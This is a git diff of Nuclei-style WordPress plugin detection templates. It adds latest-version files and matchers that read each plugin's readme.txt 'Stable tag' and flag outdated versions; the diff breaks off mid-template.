diff --git a/technologies/wordpress/wordpress-tinymce-advanced.yaml b/technologies/wordpress/wordpress-tinymce-advanced.yaml index e80b06b625..08c1de537a 100644 --- a/technologies/wordpress/wordpress-tinymce-advanced.yaml +++ b/technologies/wordpress/wordpress-tinymce-advanced.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/tinymce-advanced/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-tinymce-advanced.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-translatepress-multilingual.txt b/technologies/wordpress/wordpress-translatepress-multilingual.txt new file mode 100644 index 0000000000..acdc3f1b0b --- /dev/null +++ b/technologies/wordpress/wordpress-translatepress-multilingual.txt @@ -0,0 +1 @@ +2.4.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-translatepress-multilingual.yaml b/technologies/wordpress/wordpress-translatepress-multilingual.yaml index 7b249c86f2..c0a64bf9bc 100644 --- a/technologies/wordpress/wordpress-translatepress-multilingual.yaml +++ b/technologies/wordpress/wordpress-translatepress-multilingual.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/translatepress-multilingual/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-translatepress-multilingual.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.txt b/technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.txt new file mode 100644 index 0000000000..d845ccb115 --- /dev/null +++ b/technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.txt @@ -0,0 +1 @@ +2.0.16 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.yaml b/technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.yaml index 134298a337..c390dafde0 100644 --- a/technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.yaml +++ b/technologies/wordpress/wordpress-ultimate-addons-for-gutenberg.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/ultimate-addons-for-gutenberg/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-ultimate-addons-for-gutenberg.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-under-construction-page.txt b/technologies/wordpress/wordpress-under-construction-page.txt new file mode 100644 index 0000000000..66ad8b6f98 --- /dev/null +++ b/technologies/wordpress/wordpress-under-construction-page.txt @@ -0,0 +1 @@ +3.95 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-under-construction-page.yaml b/technologies/wordpress/wordpress-under-construction-page.yaml index fc1297fae7..f5976c95e2 100644 --- a/technologies/wordpress/wordpress-under-construction-page.yaml +++ b/technologies/wordpress/wordpress-under-construction-page.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/under-construction-page/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-under-construction-page.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-unyson.txt b/technologies/wordpress/wordpress-unyson.txt new file mode 100644 index 0000000000..c1014e0e2d --- /dev/null +++ b/technologies/wordpress/wordpress-unyson.txt @@ -0,0 +1 @@ +2.7.28 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-unyson.yaml b/technologies/wordpress/wordpress-unyson.yaml index f348d7422f..4cdeb2c64b 100644 --- a/technologies/wordpress/wordpress-unyson.yaml +++ b/technologies/wordpress/wordpress-unyson.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/unyson/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-unyson.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-updraftplus.txt b/technologies/wordpress/wordpress-updraftplus.txt new file mode 100644 index 0000000000..454b87e9b1 --- /dev/null +++ b/technologies/wordpress/wordpress-updraftplus.txt @@ -0,0 +1 @@ +1.22.23 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-updraftplus.yaml b/technologies/wordpress/wordpress-updraftplus.yaml index 4e800bebaf..624dd2eed9 100644 --- a/technologies/wordpress/wordpress-updraftplus.yaml +++ b/technologies/wordpress/wordpress-updraftplus.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/updraftplus/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-updraftplus.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-use-any-font.txt b/technologies/wordpress/wordpress-use-any-font.txt new file mode 100644 index 0000000000..8fed6e19bf --- /dev/null +++ b/technologies/wordpress/wordpress-use-any-font.txt @@ -0,0 +1 @@ +6.2.98 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-use-any-font.yaml b/technologies/wordpress/wordpress-use-any-font.yaml index a8a10d1ad4..19842cf7fb 100644 --- a/technologies/wordpress/wordpress-use-any-font.yaml +++ b/technologies/wordpress/wordpress-use-any-font.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/use-any-font/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-use-any-font.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-user-role-editor.txt b/technologies/wordpress/wordpress-user-role-editor.txt new file mode 100644 index 0000000000..6f94002d55 --- /dev/null +++ b/technologies/wordpress/wordpress-user-role-editor.txt @@ -0,0 +1 @@ +4.63.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-user-role-editor.yaml b/technologies/wordpress/wordpress-user-role-editor.yaml index b0d641177c..04e13d882d 100644 --- a/technologies/wordpress/wordpress-user-role-editor.yaml +++ b/technologies/wordpress/wordpress-user-role-editor.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/user-role-editor/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-user-role-editor.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-velvet-blues-update-urls.txt b/technologies/wordpress/wordpress-velvet-blues-update-urls.txt new file mode 100644 index 0000000000..d6bb32f36f --- /dev/null +++ b/technologies/wordpress/wordpress-velvet-blues-update-urls.txt @@ -0,0 +1 @@ +3.2.10 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-velvet-blues-update-urls.yaml b/technologies/wordpress/wordpress-velvet-blues-update-urls.yaml index 2b9a20d6cd..094c3f5064 100644 --- a/technologies/wordpress/wordpress-velvet-blues-update-urls.yaml +++ b/technologies/wordpress/wordpress-velvet-blues-update-urls.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/velvet-blues-update-urls/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-velvet-blues-update-urls.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-w3-total-cache.txt b/technologies/wordpress/wordpress-w3-total-cache.txt new file mode 100644 index 0000000000..b539adea59 --- /dev/null +++ b/technologies/wordpress/wordpress-w3-total-cache.txt @@ -0,0 +1 @@ +2.2.7 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-w3-total-cache.yaml b/technologies/wordpress/wordpress-w3-total-cache.yaml index d8488903d1..56568bf21a 100644 --- a/technologies/wordpress/wordpress-w3-total-cache.yaml +++ b/technologies/wordpress/wordpress-w3-total-cache.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/w3-total-cache/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-w3-total-cache.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-widget-importer-exporter.txt b/technologies/wordpress/wordpress-widget-importer-exporter.txt new file mode 100644 index 0000000000..dc39e58d96 --- /dev/null +++ b/technologies/wordpress/wordpress-widget-importer-exporter.txt @@ -0,0 +1 @@ +1.6 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-widget-importer-exporter.yaml b/technologies/wordpress/wordpress-widget-importer-exporter.yaml index 66459937c0..5f55d031f8 100644 --- a/technologies/wordpress/wordpress-widget-importer-exporter.yaml +++ b/technologies/wordpress/wordpress-widget-importer-exporter.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/widget-importer-exporter/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-widget-importer-exporter.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-woo-cart-abandonment-recovery.txt b/technologies/wordpress/wordpress-woo-cart-abandonment-recovery.txt new file mode 100644 index 0000000000..b830554134 --- /dev/null +++ b/technologies/wordpress/wordpress-woo-cart-abandonment-recovery.txt @@ -0,0 +1 @@ +1.2.20 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-woo-cart-abandonment-recovery.yaml b/technologies/wordpress/wordpress-woo-cart-abandonment-recovery.yaml index 68b08c99a4..de083db049 100644 --- a/technologies/wordpress/wordpress-woo-cart-abandonment-recovery.yaml +++ b/technologies/wordpress/wordpress-woo-cart-abandonment-recovery.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/woo-cart-abandonment-recovery/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-woo-cart-abandonment-recovery.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-woo-checkout-field-editor-pro.txt b/technologies/wordpress/wordpress-woo-checkout-field-editor-pro.txt new file mode 100644 index 0000000000..afa2b3515e --- /dev/null +++ b/technologies/wordpress/wordpress-woo-checkout-field-editor-pro.txt @@ -0,0 +1 @@ +1.8.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-woo-checkout-field-editor-pro.yaml b/technologies/wordpress/wordpress-woo-checkout-field-editor-pro.yaml index de8408b377..cb9927b41d 100644 --- a/technologies/wordpress/wordpress-woo-checkout-field-editor-pro.yaml +++ b/technologies/wordpress/wordpress-woo-checkout-field-editor-pro.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/woo-checkout-field-editor-pro/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-woo-checkout-field-editor-pro.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-woo-variation-swatches.txt b/technologies/wordpress/wordpress-woo-variation-swatches.txt new file mode 100644 index 0000000000..44c2012635 --- /dev/null +++ b/technologies/wordpress/wordpress-woo-variation-swatches.txt @@ -0,0 +1 @@ +N/A \ No newline at end of file diff --git a/technologies/wordpress/wordpress-woo-variation-swatches.yaml b/technologies/wordpress/wordpress-woo-variation-swatches.yaml index d77b5049bf..9249bc2a56 100644 --- a/technologies/wordpress/wordpress-woo-variation-swatches.yaml +++ b/technologies/wordpress/wordpress-woo-variation-swatches.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/woo-variation-swatches/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-woo-variation-swatches.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.txt b/technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.txt new file mode 100644 index 0000000000..abae0d9a94 --- /dev/null +++ b/technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.txt @@ -0,0 +1 @@ +2.1.3 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.yaml b/technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.yaml index 0e6b904f2e..885d5734e3 100644 --- a/technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.yaml +++ b/technologies/wordpress/wordpress-woocommerce-gateway-paypal-express-checkout.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/woocommerce-gateway-paypal-express-checkout/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-woocommerce-gateway-paypal-express-checkout.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-woocommerce-gateway-stripe.txt b/technologies/wordpress/wordpress-woocommerce-gateway-stripe.txt new file mode 100644 index 0000000000..73a86b1970 --- /dev/null +++ b/technologies/wordpress/wordpress-woocommerce-gateway-stripe.txt @@ -0,0 +1 @@ +7.0.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-woocommerce-gateway-stripe.yaml b/technologies/wordpress/wordpress-woocommerce-gateway-stripe.yaml index 31451a426d..b30dc38c4c 100644 --- a/technologies/wordpress/wordpress-woocommerce-gateway-stripe.yaml +++ b/technologies/wordpress/wordpress-woocommerce-gateway-stripe.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/woocommerce-gateway-stripe/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-woocommerce-gateway-stripe.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-woocommerce-payments.txt b/technologies/wordpress/wordpress-woocommerce-payments.txt new file mode 100644 index 0000000000..1b47e8f3ef --- /dev/null +++ b/technologies/wordpress/wordpress-woocommerce-payments.txt @@ -0,0 +1 @@ +5.1.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-woocommerce-payments.yaml b/technologies/wordpress/wordpress-woocommerce-payments.yaml index 7fc10d1027..50b7520f74 100644 --- a/technologies/wordpress/wordpress-woocommerce-payments.yaml +++ b/technologies/wordpress/wordpress-woocommerce-payments.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/woocommerce-payments/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-woocommerce-payments.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-woocommerce-paypal-payments.txt b/technologies/wordpress/wordpress-woocommerce-paypal-payments.txt new file mode 100644 index 0000000000..359a5b952d --- /dev/null +++ b/technologies/wordpress/wordpress-woocommerce-paypal-payments.txt @@ -0,0 +1 @@ +2.0.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-woocommerce-paypal-payments.yaml b/technologies/wordpress/wordpress-woocommerce-paypal-payments.yaml index 507ade5967..f50880b40c 100644 --- a/technologies/wordpress/wordpress-woocommerce-paypal-payments.yaml +++ b/technologies/wordpress/wordpress-woocommerce-paypal-payments.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/woocommerce-paypal-payments/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-woocommerce-paypal-payments.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.txt b/technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.txt new file mode 100644 index 0000000000..448ada3bda --- /dev/null +++ b/technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.txt @@ -0,0 +1 @@ +3.2.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.yaml b/technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.yaml index c5929c49d5..b2cb953121 100644 --- a/technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.yaml +++ b/technologies/wordpress/wordpress-woocommerce-pdf-invoices-packing-slips.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/woocommerce-pdf-invoices-packing-slips/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-woocommerce-pdf-invoices-packing-slips.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-woocommerce-services.txt b/technologies/wordpress/wordpress-woocommerce-services.txt new file mode 100644 index 0000000000..50aea0e7ab --- /dev/null +++ b/technologies/wordpress/wordpress-woocommerce-services.txt @@ -0,0 +1 @@ +2.1.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-woocommerce-services.yaml b/technologies/wordpress/wordpress-woocommerce-services.yaml index cd8fbe0a72..28928e67b4 100644 --- a/technologies/wordpress/wordpress-woocommerce-services.yaml +++ b/technologies/wordpress/wordpress-woocommerce-services.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/woocommerce-services/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-woocommerce-services.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-woocommerce.txt b/technologies/wordpress/wordpress-woocommerce.txt new file mode 100644 index 0000000000..3769235d3e --- /dev/null +++ b/technologies/wordpress/wordpress-woocommerce.txt @@ -0,0 +1 @@ +7.1.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-woocommerce.yaml b/technologies/wordpress/wordpress-woocommerce.yaml index 972a563105..3e8499ab24 100644 --- a/technologies/wordpress/wordpress-woocommerce.yaml +++ b/technologies/wordpress/wordpress-woocommerce.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/woocommerce/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-woocommerce.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-woosidebars.txt b/technologies/wordpress/wordpress-woosidebars.txt new file mode 100644 index 0000000000..7b5753f55b --- /dev/null +++ b/technologies/wordpress/wordpress-woosidebars.txt @@ -0,0 +1 @@ +1.4.6 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-woosidebars.yaml b/technologies/wordpress/wordpress-woosidebars.yaml index f0e6d62661..eb89e32bf5 100644 --- a/technologies/wordpress/wordpress-woosidebars.yaml +++ b/technologies/wordpress/wordpress-woosidebars.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/woosidebars/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-woosidebars.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-wordfence.txt b/technologies/wordpress/wordpress-wordfence.txt new file mode 100644 index 0000000000..9fdf3baef9 --- /dev/null +++ b/technologies/wordpress/wordpress-wordfence.txt @@ -0,0 +1 @@ +7.8.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-wordfence.yaml b/technologies/wordpress/wordpress-wordfence.yaml index d89bf10ccc..2203f5c816 100644 --- a/technologies/wordpress/wordpress-wordfence.yaml +++ b/technologies/wordpress/wordpress-wordfence.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/wordfence/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-wordfence.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: 